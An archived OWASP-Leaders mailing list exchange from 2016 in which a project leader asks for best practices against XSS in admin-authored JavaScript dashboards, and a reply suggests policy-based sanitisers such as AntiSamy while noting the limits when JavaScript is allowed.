[Owasp-leaders] Help Required : Best Practices against XSS on custom UI creation

Dave Wichers dave.wichers at owasp.org
Mon Nov 28 14:49:31 UTC 2016

What language is the application written in? There are tools like AntiSamy
that reduce the attack surface in scenarios like this as you can define a
policy of what is and is not allowed, but ultimately, if you let the admin
put in javascript there isn't much you can do.


On Mon, Nov 28, 2016 at 8:24 AM, Dibyendu Sikdar <dibyendu.coder at gmail.com>

> Hi Experts,
> Recently I have come across some projects where the application allows the
> admin to code and create custom dashboard using html5, javascript and css.
> Now all the admins can have access to these dashboards. And just because
> it can allow js to be used, a rouge admin can put an xss payload in any of
> these dashboard and can perform malicious activities which can affect other
> admins.
> What are some best practices can you recommend here ?
> --
> *Thanks and Regards,*
> *Dibyendu Sikdar*
> *https://www.linkedin.com/in/dibsyhex
> <https://www.linkedin.com/in/dibsyhex>*
> *@dibsyhex*
> *OWASP Project Leader *
> _______________________________________________
> OWASP-Leaders mailing list
> OWASP-Leaders at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-leaders
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.owasp.org/pipermail/owasp-leaders/attachments/20161128/855a824d/attachment.html>

More information about the OWASP-Leaders mailing list